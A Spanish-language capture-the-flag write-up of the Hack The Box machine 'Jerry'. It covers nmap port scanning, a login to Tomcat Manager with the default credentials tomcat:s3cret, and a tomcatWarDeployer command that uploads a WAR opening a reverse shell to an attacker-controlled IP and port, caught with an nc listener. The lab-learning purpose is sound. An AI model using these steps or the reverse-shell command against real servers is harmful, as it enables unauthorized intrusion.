Ir al contenido

Jerry

Autor
Santiago Chavarro

Descripción:
#

Maquina bastante sencilla que nos pide utilizar unas credenciales predeterminadas para explotar la carga y ejecucion de archivos war en tomcat

Enumeración
#

Lo primero que vamos a hacer en esta maquina después de conectarnos a la VPN es mandar los siguientes dos comandos de nmap con el fin de identificar los puertos abiertos y los servicios junto con sus versiones de estos puertos:

sudo nmap -p- --open --min-rate 5000 -sS -Pn -n 10.129.8.202 -oG allPorts
#El segundo comando se envia especificando los puertos que el primero nos mostro abiertos
#En este caso solo nos mostro el puerto 8080
nmap -p8080 -sVC -A {IP} -oN target

Con el primer comando vamos a hacer un escaneo rápido principalmente porque con el segundo será mas exhaustivo lo que hace el primer comando es:

  • sudo nmap -p- –open –min-rate 5000 -sS -Pn -n 10.129.8.202 -oG allPorts
    • -p-: Escanea todos los puertos (1-65535).
    • –open: Solo muestra los puertos abiertos.
    • –min-rate 5000: Establece una tasa mínima de paquetes por segundo.
    • -sS: Realiza un escaneo SYN “sigiloso”.
    • -Pn: No hace ping (asume que el host está activo).
    • -n: No realiza resolución DNS.
    • -oG allPorts: Guarda la salida en formato grepeable en el archivo allPorts.

Mientras que el segundo escaneo hace esto:

  • nmap -p8080 -sVC -A {IP} -oN target
    • -p8080: Escanea específicamente el puerto 8080.
    • -sVC: Combina las opciones -sV (detección de versión) y -sC (scripts por defecto).
    • -A: Habilita la detección de OS, versiones, scripts y traceroute.
    • -oN target: Guarda la salida en formato normal en el archivo target.

Despues de ejecutar estos dos podremos ver la siguiente salida:

Lo único que podemos ver con esto es que en el puerto 8080 esta corriendo un servicio http que esta usando Apache Tomcat .

Puerto 8080
#

Al ingresar a la pagina especificando en el navegador la IP y el puerto veremos esta pagina muy sencilla, si buscamos un poco lo único interesante que tendremos es el “Manager App” que nos pide usuario y contraseña, haciendo una rápida búsqueda de credenciales predeterminadas de apache encontramos varias probando nos daremos cuenta que funcionan tomcat:s3cret por lo que tendremos acceso a “Manager App”:

Si leemos un poco lo que dice nos podremos dar cuenta que podemos subir y desplegar archivos WAR en la pagina.

Explotación
#

Si buscamos como explotar un archivo WAR en Tomcat podremos hallar la siguiente pagina la cual nos explica como crear un archivo con una Shell reversa que podremos usar para conectarnos a la maquina Hack Tricks.

Vamos a hacer el paso a paso para poder acceder a la maquina:

#Crear el archivo infectado
git clone https://github.com/mgeeky/tomcatWarDeployer.git
cd tomcatWarDeployer
python3 tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

#Ponernos en escucha por el puerto 4444
nc -lvnp 4444

Después de ejecutar estos comandos vamos a entrar a la pagina y subir el archivo para posteriormente oprimir el botón Deploy .

Una vez hagamos esto nos debería aparecer algo parecido a lo siguiente:

Vamos a darle al botón Reload de la aplicación revshell con esto habremos ingresado a la maquina ya para obtener las dos flags para Hack The Box nos dirigiremos a:

C:\Users\Administrator\Desktop\flags